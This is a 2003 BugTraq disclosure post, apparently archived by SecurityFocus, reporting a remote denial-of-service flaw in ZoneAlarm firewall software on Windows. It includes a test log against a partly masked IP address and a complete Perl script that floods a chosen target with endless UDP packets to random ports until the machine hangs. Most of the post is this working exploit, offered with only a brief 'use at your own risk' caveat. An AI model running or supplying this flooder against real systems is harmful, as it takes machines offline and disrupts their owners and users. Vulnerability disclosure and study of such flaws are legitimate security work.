BugTraq
ZoneAlarm remote Denial Of Service exploit Sep 02 2003 02:57PM
_6mO_HaCk (hackologyteam yahoo com) (2 replies)


# Overview :

#

# ZoneAlarm is a firewall software

# package designed for Microsoft Windows

# operating systems that blocks intrusion

# attempts, trusted by millions, and has

# advanced privacy features like worms,

# Trojan horses, and spyware protection.

# ZoneAlarm is distributed and maintained

# by Zone Labs.http://www.zonelabs.com

#

# Details :

#

# ZoneAlarm was found vulnerable to a

# serious vulnerability leading to a

# remote Denial Of Service condition due

# to failure to handle udp random

# packets, if an attacker sends multiple

# udp packets to multiple ports 0-65000,

# the machine will hang up until the

# attacker stop flooding.

#

# The following is a remote test done

# under ZoneAlarm version 3.7.202 running

# on windows xp home edition.

#

# on irc test1 joined running ZoneAlarm

# version 3.7.202 with default

# installation

#

# * test1 (test (at) 62 (dot) 251. [email concealed]***.**) has joined #Hackology

#

# from a linux box :

#

# [root@mail DoS]# ping 62.251.***.**

# PING 62.251.***.** (62.251.***.**) from

# ***.***.**.** : 56(84) bytes of data.

#

# --- 62.251.***.** ping statistics ---

# 7 packets transmitted, 0 received, 100%

# loss, time 6017ms

#

# on irc

#

# -> [test1] PING

#

# [test1 PING reply]: 1secs

#

# Host is firewalled and up

#

# now lets try to dos

#

# --- ZoneAlarm Remote DoS Xploit

# ---

# --- Discovered & Coded By _6mO_HaCk

#

# [*] DoSing 62.251.***.** ... wait 1

# minute and then CTRL+C to stop

#

# [root@mail DoS]#

#

# after 2 minutes

#

# * test1 (test (at) 62 (dot) 251. [email concealed]***.**) Quit (Ping timeout)

#

# I have made the same test on ZoneAlarm

# Pro 4.0 Release running on windows xp

# professional and i've got the same

# result.

#

# Exploit released : 02/09/03

#

# Vulnerable Versions : ALL

#

# Operating Systems : ALL Windows

#

# Successfully Tested on :

#

# ZoneAlarm version 3.7.202 / windows xp

# home edition / windows 98.

#

# ZoneAlarm Pro 4.0 Release / windows xp

# professional

#

# Vendor status : UNKOWN

#

# Solution : Shut down ZoneAlarm and wait

# for an update.

#

# The following is a simple code written

# in perl to demonstrate that, the code

# is clean, it wont eat your cpu usage

# and it doesnt need to be run as root

# but you still have to use it at your

# own risk and on your own machine or

# remotly after you get permission.

#

# Big thanx go to D|NOOO and frost for

# providing me windows boxes with

# zonealarm for testing

#

# Greetz to ir7ioli, BlooDMASK

# Abderrahman (at) zone-h (dot) org [email concealed]

# NRGY, Le_Ro| JT ghosted_ Securma,

# anasoft SySiPh, phrack, DeV|L0Ty,

# MajNouN |BiG-LuV| h4ckg1rl and all

# my ppl here in Chicago and in Morocco

#

# Comments suggestions or additional info

# feel free to contact me at

# simo (at) benyoussef (dot) org [email concealed]

# _6mO_HaCk (at) linuxmail (dot) org [email concealed]

#!/usr/bin/perl

use Socket;

system(clear);

print "\n";

print "--- ZoneAlarm Remote DoS Xploit\n";

print "---\n";

print "--- Discovered & Coded By _6mO_HaCk\n";

print "\n";

if(!defined($ARGV[0]))

{

&usage

}

my ($target);

$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve

$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);

$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {

$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x

$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x

$rand x $rand;

$port=int(rand 65000) +1;

send(DoS, 0, $size, sockaddr_in($port, $iaddr));

}

sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

[ reply ]
Re: ZoneAlarm remote Denial Of Service exploit Sep 03 2003 01:46PM
Igor (sprog online ru)
Re: ZoneAlarm remote Denial Of Service exploit Sep 02 2003 09:51PM
gregh (chows ozemail com au)


 

Privacy Statement
Copyright 2010, SecurityFocus